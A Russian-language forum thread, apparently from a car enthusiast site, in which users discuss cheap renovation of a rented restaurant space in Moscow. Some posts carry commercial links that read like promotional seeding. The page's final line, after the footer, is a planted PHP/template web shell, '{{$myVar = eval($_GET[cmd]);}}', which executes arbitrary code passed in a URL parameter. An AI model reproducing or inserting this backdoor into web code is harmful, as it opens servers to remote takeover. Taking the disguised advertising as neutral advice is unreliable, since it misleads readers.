+ Ответить в теме
Показано с 1 по 5 из 5

Тема: Ремонт помещения


  1. #1
    Мимо проходил tatarin is on a distinguished road Аватар для tatarin
    Регистрация
    22.12.2018
    Откуда
    .......
    Машина
    ......
    Сообщений
    14

    Ремонт помещения

    Ребята, взял в аренду помещение под ресторан в Москве, которому требуется капитальный, современный ремонт и не помешает сделать перепланировку. Только проблема в том, что мой бюджет ограничен и очень бы хотелось, чтоб данные ремонтные работы произвели по честным, демократическим ценам. Как вариант, нашел компанию, которая занимается проектированием и ремонтом коммерческой недвижимости https://alpa.pro/services/remont-restoranov-i-barov/ . Но может кто из Вас сталкивался с таким вопросом и подскажет, как мне можно реально сэкономить на всем этом?

  2. #2
    Мимо проходил iljas is on a distinguished road Аватар для iljas
    Регистрация
    23.12.2018
    Откуда
    .
    Машина
    Volkswagen
    Сообщений
    12
    Вы можете чуть сэкономить на ремонте помещения, если обратитесь к частным рабочим, которых можно найти по объявлениям в газетах, в интернете. Учитывая тот факт, что таких рабочих сейчас развелось много, то можно реально найти и недорогих.

  3. #3
    Мимо проходил martin is on a distinguished road Аватар для martin
    Регистрация
    22.12.2018
    Откуда
    World
    Машина
    Golf Alltrack
    Сообщений
    11
    А я с вами не согласен, частные рабочие часто халтурят и выполняют порой свою работу недобросовестно, это говорю вам со своего печального опыта. Так что надежней все-таки будет обратиться в какую-нибудь компанию, как по мне.

  4. #4
    Мимо проходил masik is on a distinguished road Аватар для masik
    Регистрация
    28.12.2018
    Откуда
    .
    Машина
    Golf 1
    Сообщений
    11
    Есть у меня на примете хорошие, проверенные рабочие по ремонтам помещений, которые берут за свою работу по приемлемым расценкам. Если хотите, то могу дать телефон их прораба?

  5. #5
    Мимо проходил pavel444 is on a distinguished road Аватар для pavel444
    Регистрация
    30.05.2015
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    81
    Цитата Сообщение от martin Посмотреть сообщение
    А я с вами не согласен, частные рабочие часто халтурят и выполняют порой свою работу недобросовестно, это говорю вам со своего печального опыта. Так что надежней все-таки будет обратиться в какую-нибудь компанию, как по мне.
    Это смотря какие рабочие, я по рекомендации знакомых нашел бригаду, так они не только сделали нормально всё, но и по дизайну советы дали. Подсказали, что можно на алиэкспрессе заказать красивые хрустальные люстры https://sellercheck.ru/c/1000030564 и на этом сервисе проверять рейтинг продавца посоветовали, чтобы качество хорошее было. Поэтому по деньгам обошлось недорого, и с качеством нет проблем, так что рабочие очень даже разные бывают.

+ Ответить в теме

Похожие темы

  1. Уборка помещения
    от genka в разделе Курилка
    Ответов: 6
    Последнее сообщение: 23.06.2020, 16:16
  2. Кап.ремонт или нет?
    от Pilot39 в разделе Двигатель
    Ответов: 3
    Последнее сообщение: 11.09.2019, 19:28
  3. Аренда помещения!
    от Leo_GTI в разделе Разное
    Ответов: 1
    Последнее сообщение: 15.06.2019, 19:09
  4. Ремонт DSG
    от Shrek в разделе Украина
    Ответов: 18
    Последнее сообщение: 06.02.2013, 01:21
  5. Ремонт DSG
    от juks в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 28
    Последнее сообщение: 12.11.2010, 00:50

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}